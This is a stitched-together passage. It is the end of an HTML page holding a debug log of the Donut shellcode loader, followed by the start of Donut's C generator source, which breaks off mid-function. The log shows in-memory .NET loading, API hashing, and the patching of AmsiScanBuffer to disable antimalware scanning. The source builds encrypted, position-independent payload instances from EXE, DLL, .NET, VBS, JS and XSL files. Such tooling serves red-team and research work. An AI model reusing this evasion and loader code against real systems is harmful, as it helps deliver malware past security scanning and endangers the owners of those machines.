456 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx)
457 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6C0F670F3C85A407
458 DEBUG: peb.c:87:FindExport(): 6c0f670f3c85a407 is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance
459 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
460 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance)
461 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 2996694CA69B44E8
462 DEBUG: peb.c:87:FindExport(): 2996694ca69b44e8 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize
463 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
464 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize)
465 DEBUG: payload.c:127:ThreadProc(): Using module embedded in instance
466 DEBUG: inmem_dotnet.c:43:LoadAssembly(): Using module embedded in instance
467 DEBUG: inmem_dotnet.c:51:LoadAssembly(): CLRCreateInstance
468 DEBUG: inmem_dotnet.c:59:LoadAssembly(): ICLRMetaHost::GetRuntime("v4.0.30319")
469 DEBUG: inmem_dotnet.c:66:LoadAssembly(): ICLRRuntimeInfo::IsLoadable
470 DEBUG: inmem_dotnet.c:70:LoadAssembly(): ICLRRuntimeInfo::GetInterface
471 DEBUG: inmem_dotnet.c:78:LoadAssembly(): HRESULT: 00000000
472 DEBUG: inmem_dotnet.c:100:LoadAssembly(): ICorRuntimeHost::Start
473 DEBUG: inmem_dotnet.c:107:LoadAssembly(): ICorRuntimeHost::CreateDomain("TP7WFT9M")
474 DEBUG: inmem_dotnet.c:115:LoadAssembly(): IUnknown::QueryInterface
475 DEBUG: bypass.c:83:DisableAMSI(): Length of AmsiScanBuffer stub is 32 bytes.
476 DEBUG: bypass.c:89:DisableAMSI(): Overwriting AmsiScanBuffer
477 DEBUG: bypass.c:104:DisableAMSI(): Length of AmsiScanString stub is -16 bytes.
478 DEBUG: inmem_dotnet.c:123:LoadAssembly(): DisableAMSI OK
479 DEBUG: inmem_dotnet.c:127:LoadAssembly(): DisableWLDP OK
480 DEBUG: inmem_dotnet.c:134:LoadAssembly(): Copying 3072 bytes of assembly to safe array
481 DEBUG: inmem_dotnet.c:140:LoadAssembly(): AppDomain::Load_3
482 DEBUG: inmem_dotnet.c:147:LoadAssembly(): HRESULT : 00000000
483 DEBUG: inmem_dotnet.c:149:LoadAssembly(): Erasing assembly from memory
484 DEBUG: inmem_dotnet.c:155:LoadAssembly(): SafeArrayDestroy
485 DEBUG: inmem_dotnet.c:176:RunAssembly(): Using module embedded in instance
486 DEBUG: inmem_dotnet.c:184:RunAssembly(): Type is DLL
487 DEBUG: inmem_dotnet.c:255:RunAssembly(): SysAllocString("TestClass")
488 DEBUG: inmem_dotnet.c:259:RunAssembly(): SysAllocString("RunProcess")
489 DEBUG: inmem_dotnet.c:263:RunAssembly(): Assembly::GetType_2
490 DEBUG: inmem_dotnet.c:269:RunAssembly(): SafeArrayCreateVector(2 parameter(s))
491 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "calc.exe" as parameter 1
492 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "notepad.exe" as parameter 2
493 DEBUG: inmem_dotnet.c:292:RunAssembly(): Calling Type::InvokeMember_3
494 DEBUG: inmem_dotnet.c:306:RunAssembly(): Type::InvokeMember_3 : 00000000 : Success
495 DEBUG: inmem_dotnet.c:323:FreeAssembly(): Type::Release
496 DEBUG: inmem_dotnet.c:335:FreeAssembly(): Assembly::Release
497 DEBUG: inmem_dotnet.c:341:FreeAssembly(): AppDomain::Release
498 DEBUG: inmem_dotnet.c:347:FreeAssembly(): IUnknown::Release
499 DEBUG: inmem_dotnet.c:353:FreeAssembly(): ICorRuntimeHost::Stop
500 DEBUG: inmem_dotnet.c:356:FreeAssembly(): ICorRuntimeHost::Release
501 DEBUG: inmem_dotnet.c:362:FreeAssembly(): ICLRRuntimeInfo::Release
502 DEBUG: inmem_dotnet.c:368:FreeAssembly(): ICLRMetaHost::Release
503 DEBUG: payload.c:171:ThreadProc(): Erasing RW memory for instance
504 DEBUG: payload.c:174:ThreadProc(): Releasing RW memory for instance
505 </pre>
506
507 <p>Obviously you should be cautious with what files you decide to execute on your machine.</p>
508
509 </body>
510 </html>
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include "donut.h"
32
33 #include "payload/payload_exe_x86.h"
34 #include "payload/payload_exe_x64.h"
35
36 #define PUT_BYTE(p, v) { *(uint8_t *)(p) = (uint8_t) (v); p = (uint8_t*)p + 1; }
37 #define PUT_HWORD(p, v) { t=v; memcpy((char*)p, (char*)&t, 2); p = (uint8_t*)p + 2; }
38 #define PUT_WORD(p, v) { t=v; memcpy((char*)p, (char*)&t, 4); p = (uint8_t*)p + 4; }
39 #define PUT_BYTES(p, v, n) { memcpy(p, v, n); p = (uint8_t*)p + n; }
40
41 // these have to be in same order as DONUT_INSTANCE structure in donut.h
42 static API_IMPORT api_imports[]=
43 {
44 {KERNEL32_DLL, "LoadLibraryA"},
45 {KERNEL32_DLL, "GetProcAddress"},
46 {KERNEL32_DLL, "GetModuleHandleA"},
47 {KERNEL32_DLL, "VirtualAlloc"},
48 {KERNEL32_DLL, "VirtualFree"},
49 {KERNEL32_DLL, "VirtualQuery"},
50 {KERNEL32_DLL, "VirtualProtect"},
51 {KERNEL32_DLL, "Sleep"},
52 {KERNEL32_DLL, "MultiByteToWideChar"},
53 {KERNEL32_DLL, "GetUserDefaultLCID"},
54
55 {OLEAUT32_DLL, "SafeArrayCreate"},
56 {OLEAUT32_DLL, "SafeArrayCreateVector"},
57 {OLEAUT32_DLL, "SafeArrayPutElement"},
58 {OLEAUT32_DLL, "SafeArrayDestroy"},
59 {OLEAUT32_DLL, "SafeArrayGetLBound"},
60 {OLEAUT32_DLL, "SafeArrayGetUBound"},
61 {OLEAUT32_DLL, "SysAllocString"},
62 {OLEAUT32_DLL, "SysFreeString"},
63 {OLEAUT32_DLL, "LoadTypeLib"},
64
65 {WININET_DLL, "InternetCrackUrlA"},
66 {WININET_DLL, "InternetOpenA"},
67 {WININET_DLL, "InternetConnectA"},
68 {WININET_DLL, "InternetSetOptionA"},
69 {WININET_DLL, "InternetReadFile"},
70 {WININET_DLL, "InternetCloseHandle"},
71 {WININET_DLL, "HttpOpenRequestA"},
72 {WININET_DLL, "HttpSendRequestA"},
73 {WININET_DLL, "HttpQueryInfoA"},
74
75 {MSCOREE_DLL, "CorBindToRuntime"},
76 {MSCOREE_DLL, "CLRCreateInstance"},
77
78 {OLE32_DLL, "CoInitializeEx"},
79 {OLE32_DLL, "CoCreateInstance"},
80 {OLE32_DLL, "CoUninitialize"},
81
82 { NULL, NULL }
83 };
84
85 // required to load .NET assemblies
86 static GUID xCLSID_CorRuntimeHost = {
87 0xcb2f6723, 0xab3a, 0x11d2, {0x9c, 0x40, 0x00, 0xc0, 0x4f, 0xa3, 0x0a, 0x3e}};
88
89 static GUID xIID_ICorRuntimeHost = {
90 0xcb2f6722, 0xab3a, 0x11d2, {0x9c, 0x40, 0x00, 0xc0, 0x4f, 0xa3, 0x0a, 0x3e}};
91
92 static GUID xCLSID_CLRMetaHost = {
93 0x9280188d, 0xe8e, 0x4867, {0xb3, 0xc, 0x7f, 0xa8, 0x38, 0x84, 0xe8, 0xde}};
94
95 static GUID xIID_ICLRMetaHost = {
96 0xD332DB9E, 0xB9B3, 0x4125, {0x82, 0x07, 0xA1, 0x48, 0x84, 0xF5, 0x32, 0x16}};
97
98 static GUID xIID_ICLRRuntimeInfo = {
99 0xBD39D1D2, 0xBA2F, 0x486a, {0x89, 0xB0, 0xB4, 0xB0, 0xCB, 0x46, 0x68, 0x91}};
100
101 static GUID xIID_AppDomain = {
102 0x05F696DC, 0x2B29, 0x3663, {0xAD, 0x8B, 0xC4,0x38, 0x9C, 0xF2, 0xA7, 0x13}};
103
104 // required to load VBS and JS files
105 static GUID xIID_IUnknown = {
106 0x00000000, 0x0000, 0x0000, {0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46}};
107
108 static GUID xIID_IDispatch = {
109 0x00020400, 0x0000, 0x0000, {0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46}};
110
111 static GUID xIID_IHost = {
112 0x91afbd1b, 0x5feb, 0x43f5, {0xb0, 0x28, 0xe2, 0xca, 0x96, 0x06, 0x17, 0xec}};
113
114 static GUID xIID_IActiveScript = {
115 0xbb1a2ae1, 0xa4f9, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}};
116
117 static GUID xIID_IActiveScriptSite = {
118 0xdb01a1e3, 0xa42b, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}};
119
120 static GUID xIID_IActiveScriptParse32 = {
121 0xbb1a2ae2, 0xa4f9, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}};
122
123 static GUID xIID_IActiveScriptParse64 = {
124 0xc7ef7658, 0xe1ee, 0x480e, {0x97, 0xea, 0xd5, 0x2c, 0xb4, 0xd7, 0x6d, 0x17}};
125
126 static GUID xCLSID_VBScript = {
127 0xB54F3741, 0x5B07, 0x11cf, {0xA4, 0xB0, 0x00, 0xAA, 0x00, 0x4A, 0x55, 0xE8}};
128
129 static GUID xCLSID_JScript = {
130 0xF414C260, 0x6AC0, 0x11CF, {0xB6, 0xD1, 0x00, 0xAA, 0x00, 0xBB, 0xBB, 0x58}};
131
132 // required to load XSL files
133 static GUID xCLSID_DOMDocument30 = {
134 0xf5078f32, 0xc551, 0x11d3, {0x89, 0xb9, 0x00, 0x00, 0xf8, 0x1f, 0xe2, 0x21}};
135
136 static GUID xIID_IXMLDOMDocument = {
137 0x2933BF81, 0x7B36, 0x11D2, {0xB2, 0x0E, 0x00, 0xC0, 0x4F, 0x98, 0x3E, 0x60}};
138
139 static GUID xIID_IXMLDOMNode = {
140 0x2933bf80, 0x7b36, 0x11d2, {0xb2, 0x0e, 0x00, 0xc0, 0x4f, 0x98, 0x3e, 0x60}};
141
142 #if defined(_WIN32) | defined(_WIN64)
143 #include "include/mmap-windows.c"
144 #ifdef _MSC_VER
145 #define strcasecmp stricmp
146 #endif
147 #endif
148
149 // return pointer to DOS header
150 static PIMAGE_DOS_HEADER DosHdr(void *map) {
151 return (PIMAGE_DOS_HEADER)map;
152 }
153
154 // return pointer to NT headers
155 static PIMAGE_NT_HEADERS NtHdr (void *map) {
156 return (PIMAGE_NT_HEADERS) ((uint8_t*)map + DosHdr(map)->e_lfanew);
157 }
158
159 // return pointer to File header
160 static PIMAGE_FILE_HEADER FileHdr (void *map) {
161 return &NtHdr(map)->FileHeader;
162 }
163
164 // determines CPU architecture of binary
165 static int is32 (void *map) {
166 return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_I386;
167 }
168
169 // return pointer to Optional header
170 static void* OptHdr (void *map) {
171 return (void*)&NtHdr(map)->OptionalHeader;
172 }
173
174 static PIMAGE_DATA_DIRECTORY Dirs (void *map) {
175 if (is32(map)) {
176 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->DataDirectory;
177 } else {
178 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->DataDirectory;
179 }
180 }
181
182 // valid dos header?
183 static int valid_dos_hdr (void *map) {
184 PIMAGE_DOS_HEADER dos = DosHdr(map);
185
186 if (dos->e_magic != IMAGE_DOS_SIGNATURE) return 0;
187 return (dos->e_lfanew != 0);
188 }
189
190 // valid nt headers
191 static int valid_nt_hdr (void *map) {
192 return NtHdr(map)->Signature == IMAGE_NT_SIGNATURE;
193 }
194
195 static ULONG64 rva2ofs (void *base, DWORD rva) {
196 DWORD i;
197 ULONG64 ofs;
198 PIMAGE_DOS_HEADER dos;
199 PIMAGE_NT_HEADERS nt;
200 PIMAGE_SECTION_HEADER sh;
201
202 dos = (PIMAGE_DOS_HEADER)base;
203 nt = (PIMAGE_NT_HEADERS)((PBYTE)base + dos->e_lfanew);
204 sh = IMAGE_FIRST_SECTION(nt);
205
206 for (i=0; i<nt->FileHeader.NumberOfSections; i++) {
207 if (rva >= sh[i].VirtualAddress &&
208 rva < sh[i].VirtualAddress + sh[i].SizeOfRawData) {
209
210 ofs = sh[i].PointerToRawData + (rva - sh[i].VirtualAddress);
211 return ofs;
212 }
213 }
214 return -1;
215 }
216
217 // map a file into memory for reading
218 static int map_file(const char *path, file_info *fi) {
219 struct stat fs;
220
221 DPRINT("Reading size of file : %s", path);
222 if(stat(path, &fs) != 0) {
223 return DONUT_ERROR_FILE_NOT_FOUND;
224 }
225
226 if(fs.st_size == 0) {
227 return DONUT_ERROR_FILE_EMPTY;
228 }
229
230 DPRINT("Opening %s", path);
231 fi->fd = open(path, O_RDONLY);
232
233 if(fi->fd < 0) {
234 return DONUT_ERROR_FILE_ACCESS;
235 }
236
237 fi->size = fs.st_size;
238
239 // map into memory
240 DPRINT("Mapping %" PRIi64 " bytes for %s", fi->size, path);
241 fi->map = mmap(NULL, fi->size,
242 PROT_READ, MAP_PRIVATE, fi->fd, 0);
243
244 // no mapping? close file
245 if(fi->map == NULL) {
246 close(fi->fd);
247 fi->map = NULL;
248 return DONUT_ERROR_NO_MEMORY;
249 }
250 return DONUT_ERROR_SUCCESS;
251 }
252
253 // unmap a file from memory previously opened with map_file()
254 static int unmap_file(file_info *fi) {
255
256 if(fi == NULL) return 0;
257
258 DPRINT("Unmapping");
259 munmap(fi->map, fi->size);
260
261 DPRINT("Closing");
262 close(fi->fd);
263
264 return 1;
265 }
266
267 static int get_file_info(const char *path, file_info *fi) {
268 PIMAGE_NT_HEADERS nt;
269 PIMAGE_DATA_DIRECTORY dir;
270 PMDSTORAGESIGNATURE pss;
271 PIMAGE_COR20_HEADER cor;
272 DWORD dll, rva, ofs, cpu;
273 PCHAR ext;
274 int err = DONUT_ERROR_SUCCESS;
275
276 DPRINT("Entering.");
277
278 // invalid parameters passed?
279 if(path == NULL || fi == NULL) {
280 return DONUT_ERROR_INVALID_PARAMETER;
281 }
282 // zero initialize file_info structure
283 memset(fi, 0, sizeof(file_info));
284
285 DPRINT("Checking extension of %s", path);
286 ext = strrchr(path, '.');
287
288 // no extension? exit
289 if(ext == NULL) {
290 return DONUT_ERROR_FILE_INVALID;
291 }
292 DPRINT("Extension is \"%s\"", ext);
293
294 // VBScript?
295 if (strcasecmp(ext, ".vbs") == 0) {
296 DPRINT("Module is VBS");
297 fi->type = DONUT_MODULE_VBS;
298 fi->arch = DONUT_ARCH_ANY;
299 } else
300 // JScript?
301 if (strcasecmp(ext, ".js") == 0) {
302 DPRINT("Module is JS");
303 fi->type = DONUT_MODULE_JS;
304 fi->arch = DONUT_ARCH_ANY;
305 } else
306 // XSL?
307 if (strcasecmp(ext, ".xsl") == 0) {
308 DPRINT("Module is XSL");
309 fi->type = DONUT_MODULE_XSL;
310 fi->arch = DONUT_ARCH_ANY;
311 } else
312 // EXE?
313 if (strcasecmp(ext, ".exe") == 0) {
314 DPRINT("Module is EXE");
315 fi->type = DONUT_MODULE_EXE;
316 } else
317 // DLL?
318 if (strcasecmp(ext, ".dll") == 0) {
319 DPRINT("Module is DLL");
320 fi->type = DONUT_MODULE_DLL;
321 } else {
322 // unrecognized extension
323 return DONUT_ERROR_FILE_INVALID;
324 }
325
326 DPRINT("Mapping %s into memory", path);
327
328 err = map_file(path, fi);
329 if(err != DONUT_ERROR_SUCCESS) return err;
330
331 // file is EXE or DLL?
332 if(fi->type == DONUT_MODULE_DLL ||
333 fi->type == DONUT_MODULE_EXE)
334 {
335 DPRINT("Checking DOS header");
336
337 if(!valid_dos_hdr(fi->map)) {
338 err = DONUT_ERROR_FILE_INVALID;
339 goto cleanup;
340 }
341 DPRINT("Checking NT header");
342
343 if(!valid_nt_hdr(fi->map)) {
344 err = DONUT_ERROR_FILE_INVALID;
345 goto cleanup;
346 }
347 DPRINT("Checking IMAGE_DATA_DIRECTORY");
348
349 dir = Dirs(fi->map);
350
351 if(dir == NULL) {
352 err = DONUT_ERROR_FILE_INVALID;
353 goto cleanup;
354 }
355 DPRINT("Checking characteristics");
356
357 nt = NtHdr(fi->map);
358 dll = nt->FileHeader.Characteristics & IMAGE_FILE_DLL;
359 cpu = is32(fi->map);
360 rva = dir[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress;
361
362 // set the CPU architecture for file
363 fi->arch = cpu ? DONUT_ARCH_X86 : DONUT_ARCH_X64;
364
365 // if COM directory present
366 if(rva != 0) {
367 DPRINT("COM Directory found");
368
369 // set type to EXE or DLL assembly
370 fi->type = (dll) ? DONUT_MODULE_NET_DLL : DONUT_MODULE_NET_EXE;
371
372 // try read the runtime version from meta header
373 strncpy(fi->ver, "v4.0.30319", DONUT_VER_LEN - 1);
374
375 ofs = rva2ofs(fi->map, rva);
376 if (ofs != -1) {
377 cor = (PIMAGE_COR20_HEADER)(ofs + fi->map);
378 rva = cor->MetaData.VirtualAddress;
379 if(rva != 0) {
380 ofs = rva2ofs(fi->map, rva);
381 if(ofs != -1) {
382 pss = (PMDSTORAGESIGNATURE)(ofs + fi->map);
383 DPRINT("Runtime version : %s", (char*)pss->pVersion);
384 strncpy(fi->ver, (char*)pss->pVersion, DONUT_VER_LEN - 1);
385 }
386 }
387 }
388 }
389 }
390 cleanup:
391 if(err != DONUT_ERROR_SUCCESS) {
392 unmap_file(fi);
393 }
394 DPRINT("Leaving.");
395 return err;
396 }
397
398 // check if DLL exports function name
399 static int is_dll_export(file_info *fi, const char *function) {
400 PIMAGE_DATA_DIRECTORY dir;
401 PIMAGE_EXPORT_DIRECTORY exp;
402 DWORD rva, ofs, cnt;
403 PDWORD sym;
404 PCHAR str;
405 int found = 0;
406
407 DPRINT("Entering.");
408
409 dir = Dirs(fi->map);
410 if(dir != NULL) {
411 rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
412 DPRINT("EAT VA : %lx", rva);
413 if(rva != 0) {
414 ofs = rva2ofs(fi->map, rva);
415 if(ofs != -1) {
416 exp = (PIMAGE_EXPORT_DIRECTORY)(fi->map + ofs);
417 cnt = exp->NumberOfNames;
418 DPRINT("Number of exported functions : %lx", cnt);
419
420 if(cnt != 0) {
421 sym = (PDWORD)(rva2ofs(fi->map, exp->AddressOfNames) + fi->map);
422 // scan array for symbol
423 do {
424 str = (PCHAR)(rva2ofs(fi->map, sym[cnt - 1]) + fi->map);
425 DPRINT("Checking %s", str);
426 // if match found, exit
427 if(strcmp(str, function) == 0) {
428 DPRINT("Found API");
429 found = 1;
430 break;
431 }
432 } while (--cnt);
433 }
434 }
435 }
436 }
437 DPRINT("Leaving.");
438 return found;
439 }
440
441 // returns 1 on success else <=0
442 static int CreateRandom(void *buf, uint64_t len) {
443
444 #if defined(WINDOWS)
445 HCRYPTPROV prov;
446 int ok;
447
448 // 1. acquire crypto context
449 if(!CryptAcquireContext(
450 &prov, NULL, NULL,
451 PROV_RSA_AES,
452 CRYPT_VERIFYCONTEXT | CRYPT_SILENT)) return 0;
453
454 ok = (int)CryptGenRandom(prov, (DWORD)len, buf);
455 CryptReleaseContext(prov, 0);
456
457 return ok;
458 #else
459 int fd;
460 uint64_t r=0;
461 uint8_t *p=(uint8_t*)buf;
462
463 DPRINT("Opening /dev/urandom to acquire %li bytes", len);
464 fd = open("/dev/urandom", O_RDONLY);
465
466 if(fd > 0) {
467 for(r=0; r<len; r++, p++) {
468 if(read(fd, p, 1) != 1) break;
469 }
470 close(fd);
471 }
472 DPRINT("Acquired %li of %li bytes requested", r, len);
473 return r == len;
474 #endif
475 }
476
477 // Generate a random string, not exceeding DONUT_MAX_NAME bytes
478 // tbl is from https://stackoverflow.com/a/27459196
479 static int GenRandomString(void *output, uint64_t len) {
480 uint8_t rnd[DONUT_MAX_NAME];
481 int i;
482 char tbl[]="HMN34P67R9TWCXYF";
483 char *str = (char*)output;
484
485 if(len == 0 || len > (DONUT_MAX_NAME - 1)) return 0;
486
487 // generate DONUT_MAX_NAME random bytes
488 if(!CreateRandom(rnd, DONUT_MAX_NAME)) return 0;
489
490 // generate a string using unambiguous characters
491 for(i=0; i<len; i++) {
492 str[i] = tbl[rnd[i] % (sizeof(tbl) - 1)];
493 }
494 str[i] = 0;
495 return 1;
496 }
497
498 // cheapo conversion from utf8 to utf16
499 static uint64_t utf8_to_utf16(void* dst, const char* src) {
500 uint16_t *out = (uint16_t*)dst;
501 uint64_t i;
502
503 for(i=0; src[i] != 0; i++) {
504 out[i] = src[i];
505 }
506 return i;
507 }
508
509 static int CreateModule(PDONUT_CONFIG c, file_info *fi) {
510 PDONUT_MODULE mod = NULL;
511 uint64_t len = 0;
512 char *param, parambuf[DONUT_MAX_NAME*DONUT_MAX_PARAM+DONUT_MAX_PARAM];
513 int cnt, err=DONUT_ERROR_SUCCESS;
514
515 DPRINT("Entering.");
516
517 // Allocate memory for module information and contents of file
518 len = sizeof(DONUT_MODULE) + fi->size;
519 DPRINT("Allocating %" PRIi64 " bytes of memory for DONUT_MODULE", len);
520 mod = calloc(len, 1);
521
522 // Memory not allocated? exit
523 if(mod == NULL) {
524 return DONUT_ERROR_NO_MEMORY;
525 }
526
527 // Set the type of module
528 mod->type = fi->type;
529
530 // DotNet assembly?
531 if(mod->type == DONUT_MODULE_NET_DLL ||
532 mod->type == DONUT_MODULE_NET_EXE)
533 {
534 // If no domain name specified, generate a random one
535 if(c->domain[0] == 0) {
536 if(!GenRandomString(c->domain, DONUT_DOMAIN_LEN)) {
537 err = DONUT_ERROR_RANDOM;
538 goto cleanup;
539 }
540 }
541 // convert to unicode format.
542 // wchar_t is 32-bits on linux, but 16-bit on windows. :-|
543 DPRINT("Domain : %s", c->domain);
544 utf8_to_utf16(mod->domain, c->domain);
545
546 // Assembly is DLL? Copy the class and method
547 if(mod->type == DONUT_MODULE_NET_DLL) {
548 DPRINT("Class : %s", c->cls);
549 utf8_to_utf16(mod->cls, c->cls);
550
551 DPRINT("Method : %s", c->method);
552 utf8_to_utf16(mod->method, c->method);
553 }
554 // If no runtime specified in configuration, use version from assembly
555 if(c->runtime[0] == 0) {
556 strncpy(c->runtime, fi->ver, DONUT_MAX_NAME-1);
557 }
558 DPRINT("Runtime : %s", c->runtime);
559 utf8_to_utf16(mod->runtime, c->runtime);
560 } else
561 // Unmanaged DLL? check for exported api
562 if(mod->type == DONUT_MODULE_DLL &&
563 c->method[0] != 0)
564 {
565 DPRINT("DLL function : %s", c->method);
566 strncpy((char*)mod->method, c->method, DONUT_MAX_NAME-1);
567 }
568
569 // Parameters specified?
570 if(c->param[0] != 0) {
571 strncpy(parambuf, c->param, sizeof(parambuf)-1);
572 cnt = 0;
573 // Split by comma or semi-colon
574 param = strtok(parambuf, ",;");
575
576 while(param != NULL && cnt < DONUT_MAX_PARAM) {
577 if(strlen(param) >= DONUT_MAX_NAME) {
578 DPRINT("Parameter : \"%s\" exceeds DONUT_MAX_PARAM(%i)",
579 param, DONUT_MAX_NAME);
580 err = DONUT_ERROR_INVALID_PARAMETER;
581 goto cleanup;
582 }
583 DPRINT("Adding \"%s\"", param);
584 // convert ansi string to wide character string
585 utf8_to_utf16(mod->param[cnt++], param);
586
587 // get next parameter
588 param = strtok(NULL, ",;");
589 }
590 // set number of parameters
591 mod->param_cnt = cnt;
592 }
593
594 // set length of module data
595 mod->len = fi->size;
596 // read module into memory
597 memcpy(&mod->data, fi->map, fi->size);
598 // update configuration with pointer to module
599 c->mod = mod;
600 c->mod_len = len;
601
602 cleanup:
603 // if there was an error, free memory for module
604 if(err != DONUT_ERROR_SUCCESS && mod != NULL) {
605 free(mod);
606 c->mod = NULL;
607 c->mod_len = 0;
608 }
609 DPRINT("Leaving.");
610 return err;
611 }
612
613 static int CreateInstance(PDONUT_CONFIG c, file_info *fi) {
614 DONUT_CRYPT inst_key, mod_key;
615 PDONUT_INSTANCE inst;
616 uint64_t inst_len;
617 uint64_t dll_hash;
618 int cnt;
619
620 DPRINT("Entering.");
621
622 // Allocate memory for the size of instance based on the type
623 DPRINT("Allocating space for instance");
624 inst_len = sizeof(DONUT_INSTANCE);
625
626 // if this is a PIC instance, add the size of module
627 // that will be appended to the end of structure
628 if(c->inst_type == DONUT_INSTANCE_PIC) {
629 DPRINT("The size of module is %" PRIi64 " bytes. "
630 "Adding to size of instance.", c->mod_len);
631 inst_len += c->mod_len;
632 }
633 // allocate zero-initialized memory for instance
634 inst = (PDONUT_INSTANCE)calloc(inst_len, 1);
635
636 // Memory allocation failed? exit
637 if(inst == NULL) {
638 return DONUT_ERROR_NO_MEMORY;
639 }
640
641 #if !defined(NOCRYPTO)
642 DPRINT("Generating random key for instance");
643 if(!CreateRandom(&inst_key, sizeof(DONUT_CRYPT))) {
644 return DONUT_ERROR_RANDOM;
645 }
646 memcpy(&inst->key, &inst_key, sizeof(DONUT_CRYPT));
647
648 DPRINT("Generating random key for module");
649 if(!CreateRandom(&mod_key, sizeof(DONUT_CRYPT))) {
650 return DONUT_ERROR_RANDOM;
651 }
652 memcpy(&inst->mod_key, &mod_key, sizeof(DONUT_CRYPT));
653
654 DPRINT("Generating random string to verify decryption");
655 if(!GenRandomString(inst->sig, DONUT_SIG_LEN)) {
656 return DONUT_ERROR_RANDOM;
657 }
658 #endif
659
660 DPRINT("Generating random IV for Maru hash");
661 if(!CreateRandom(&inst->iv, MARU_IV_LEN)) {
662 return DONUT_ERROR_RANDOM;
663 }
664
665 DPRINT("Generating hashes for API using IV: %" PRIx64, inst->iv);
666
667 for(cnt=0; api_imports[cnt].module != NULL; cnt++) {
668 // calculate hash for DLL string
669 dll_hash = maru(api_imports[cnt].module, inst->iv);
670
671 // calculate hash for API string.
672 // xor with DLL hash and store in instance
673 inst->api.hash[cnt] = maru(api_imports[cnt].name, inst->iv) ^ dll_hash;
674
675 DPRINT("Hash for %-15s : %-22s = %" PRIX64,
676 api_imports[cnt].module,
677 api_imports[cnt].name,
678 inst->api.hash[cnt]);
679 }
680 // save how many API to resolve
681 inst->api_cnt = cnt;
682 inst->dll_cnt = 0;
683
684 strcpy(inst->dll_name[inst->dll_cnt++], "ole32.dll");
685 strcpy(inst->dll_name[inst->dll_cnt++], "oleaut32.dll");
686 strcpy(inst->dll_name[inst->dll_cnt++], "wininet.dll");
687 strcpy(inst->dll_name[inst->dll_cnt++], "mscoree.dll");
688
689 // if module is .NET assembly
690 if(c->mod_type == DONUT_MODULE_NET_DLL ||
691 c->mod_type == DONUT_MODULE_NET_EXE)
692 {
693 DPRINT("Copying GUID structures and DLL strings for loading .NET assemblies");
694
695 memcpy(&inst->xIID_AppDomain, &xIID_AppDomain, sizeof(GUID));
696 memcpy(&inst->xIID_ICLRMetaHost, &xIID_ICLRMetaHost, sizeof(GUID));
697 memcpy(&inst->xCLSID_CLRMetaHost, &xCLSID_CLRMetaHost, sizeof(GUID));
698 memcpy(&inst->xIID_ICLRRuntimeInfo, &xIID_ICLRRuntimeInfo, sizeof(GUID));
699 memcpy(&inst->xIID_ICorRuntimeHost, &xIID_ICorRuntimeHost, sizeof(GUID));
700 memcpy(&inst->xCLSID_CorRuntimeHost, &xCLSID_CorRuntimeHost, sizeof(GUID));
701 } else
702 // if module is VBS or JS
703 if(c->mod_type == DONUT_MODULE_VBS ||
704 c->mod_type == DONUT_MODULE_JS)
705 {
706 DPRINT("Copying GUID structures and DLL strings for loading VBS/JS");
707
708 memcpy(&inst->xIID_IUnknown, &xIID_IUnknown, sizeof(GUID));
709 memcpy(&inst->xIID_IDispatch, &xIID_IDispatch, sizeof(GUID));
710 memcpy(&inst->xIID_IHost, &xIID_IHost, sizeof(GUID));
711 memcpy(&inst->xIID_IActiveScript, &xIID_IActiveScript, sizeof(GUID));
712 memcpy(&inst->xIID_IActiveScriptSite, &xIID_IActiveScriptSite, sizeof(GUID));
713 memcpy(&inst->xIID_IActiveScriptParse32, &xIID_IActiveScriptParse32, sizeof(GUID));
